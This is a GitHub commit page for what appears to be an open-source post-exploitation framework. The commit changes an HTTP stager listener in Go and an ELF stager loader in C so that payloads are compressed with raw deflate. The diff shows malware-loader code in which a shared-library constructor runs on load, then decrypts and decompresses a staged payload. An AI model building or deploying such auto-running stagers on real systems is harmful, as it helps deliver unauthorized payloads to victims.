Skip to content

Commit

Permalink
feat: support payload compression in stager
Browse files Browse the repository at this point in the history
  • Loading branch information
jm33-m0 committed Dec 26, 2024
1 parent 6f33bb0 commit 97b271a
Show file tree
Hide file tree
Showing 2 changed files with 21 additions and 8 deletions.
11 changes: 7 additions & 4 deletions core/cmd/listener/http_stager.go
Original file line number Diff line number Diff line change
Expand Up @@ -2,7 +2,7 @@ package main

import (
"bytes"
"compress/zlib"
"compress/flate"
"crypto/aes"
"crypto/cipher"
"crypto/rand"
Expand Down Expand Up @@ -43,11 +43,14 @@ func encryptData(data []byte, key []byte) []byte {
return append(iv, encrypted...)
}

// compressData compresses the given data using zlib.
// compressData compresses the given data using raw deflate.
func compressData(data []byte) []byte {
var b bytes.Buffer
w := zlib.NewWriter(&b)
_, err := w.Write(data)
w, err := flate.NewWriter(&b, flate.BestCompression)
if err != nil {
log.Fatalf("Failed to create deflate writer: %v", err)
}
_, err = w.Write(data)
if err != nil {
log.Fatalf("Failed to compress data: %v", err)
}
Expand Down
18 changes: 14 additions & 4 deletions loader/elf/stager.c
Original file line number Diff line number Diff line change
Expand Up @@ -241,6 +241,15 @@ void __attribute__((constructor)) initLibrary(void) {
DEBUG_PRINT("Encrypted data size: %zu\n", data_size - 16);
size_t decrypted_size = decrypt_data(buf + 16, data_size - 16, key, iv);

// copy the decrypted data to a new buffer
char *decrypted_data = calloc(decrypted_size, sizeof(char));
if (!decrypted_data) {
perror("malloc");
free(buf);
return;
}
memcpy(decrypted_data, buf + 16, decrypted_size);

#ifdef DEBUG
// Save the decrypted data to disk
FILE *file = fopen("/tmp/decrypted_data", "wb");
Expand All @@ -254,16 +263,17 @@ void __attribute__((constructor)) initLibrary(void) {
#endif

// Decompress the decrypted data
unsigned int decompressed_size = BUFFER_SIZE * 10; // Adjust as needed
char *decompressed_buffer = malloc(decompressed_size);
unsigned int decompressed_size = decrypted_size * 10; // Adjust as needed
char *decompressed_buffer = calloc(decompressed_size, sizeof(char));
if (!decompressed_buffer) {
perror("malloc");
free(buf);
return;
}
DEBUG_PRINT("Allocated decompressed buffer of size: %u\n", decompressed_size);

int res = tinf_zlib_uncompress(decompressed_buffer, &decompressed_size,
buf + 16, decrypted_size);
int res = tinf_uncompress(decompressed_buffer, &decompressed_size,
decrypted_data, decrypted_size);
free(buf);
if (res != TINF_OK) {
fprintf(stderr, "Decompression failed: %d\n", res);
Expand Down

0 comments on commit 97b271a

Please sign in to comment.